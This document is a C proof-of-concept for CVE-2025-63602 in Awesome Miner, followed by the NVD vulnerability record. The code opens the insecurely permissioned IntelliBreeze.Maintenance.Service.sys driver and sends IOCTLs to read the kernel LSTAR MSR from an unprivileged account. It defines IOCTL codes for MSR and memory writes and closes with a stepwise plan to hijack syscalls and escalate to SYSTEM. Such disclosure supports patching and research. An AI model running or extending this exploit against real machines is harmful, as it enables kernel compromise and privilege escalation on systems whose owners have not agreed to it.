CVE-2025-63602

/* CVE-2025-63602 Proof of Concept Target: Awesome Miner thru 11.2.4 (IntelliBreeze.Maintenance.Service.sys) Type: Local Privilege Escalation via Insecure WinRing0 Driver Note: This is a conceptual PoC for educational and security research purposes only. */ #include <windows.h> #include <stdio.h> #define IOCTL_READ_MSR 0x9C402408 #define IOCTL_WRITE_MSR 0x9C40240C #define IOCTL_READ_MEM 0x9C402400 #define IOCTL_WRITE_MEM 0x9C402404 // MSR addresses #define MSR_LSTAR 0xC0000082 int main() { HANDLE hDevice; DWORD bytesReturned; DWORD inputBuffer[2]; DWORD outputBuffer; BOOL result; printf("[*] CVE-2025-63602 PoC - Awesome Miner LPE\n"); printf("[*] Opening driver handle...\n"); // Open handle to vulnerable driver hDevice = CreateFileA( "\\\\.\\IntelliBreezeMaintenanceService", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open driver handle. Error: %d\n", GetLastError()); return 1; } printf("[+] Driver handle opened successfully\n"); printf("[*] Reading LSTAR MSR (0xC0000082)...\n"); // Read LSTAR MSR to demonstrate arbitrary MSR access inputBuffer[0] = MSR_LSTAR; result = DeviceIoControl( hDevice, IOCTL_READ_MSR, inputBuffer, sizeof(inputBuffer), &outputBuffer, sizeof(outputBuffer), &bytesReturned, NULL ); if (result) { printf("[+] LSTAR MSR value: 0x%llX\n", outputBuffer); printf("[!] Successfully read kernel MSR as unprivileged user!\n"); printf("[*] This demonstrates the vulnerability - arbitrary MSR access.\n"); printf("[*] An attacker could write to this MSR to hijack syscalls.\n"); } else { printf("[-] Failed to read MSR. Error: %d\n", GetLastError()); } CloseHandle(hDevice); return 0; } /* Attack Scenario: 1. Attacker with low-privilege access opens handle to IntelliBreeze.Maintenance.Service.sys 2. Uses IOCTL interface to read/write MSR registers (e.g., LSTAR) 3. Modifies LSTAR to point to malicious code location 4. Triggers a syscall to execute attacker-controlled code in kernel mode 5. Escalates privileges to SYSTEM */

{"cve": {"id": "CVE-2025-63602", "sourceIdentifier": "[email protected]", "published": "2025-11-18T16:15:45.593", "lastModified": "2025-12-31T02:24:57.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was discovered in Awesome Miner thru 11.2.4 that allows arbitrary read and write to kernel memory and MSRs (such as LSTAR) as an unprivileged user. This is due to the implementation of an insecure version of WinRing0 (1.2.0.5, renamed to IntelliBreeze.Maintenance.Service.sys) that lacks a properly secured DACL, allowing unprivileged users to interact with the driver and, as a result, the kernel. This can result in local privilege escalation, information disclosure, denial of service, and other unspecified impacts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:awesomeminer:awesome_miner:11.2.4:*:*:*:*:*:*:*", "matchCriteriaId": "918D856C-EE5E-4B5F-AB6C-8401754C2208"}]}]}], "references": [{"url": "https://dreadsec.co/p/cve-2025-63602-hijacking-system-calls-with-a-popular-crypto-miner.html", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.awesomeminer.com/download", "source": "[email protected]", "tags": ["Product"]}]}}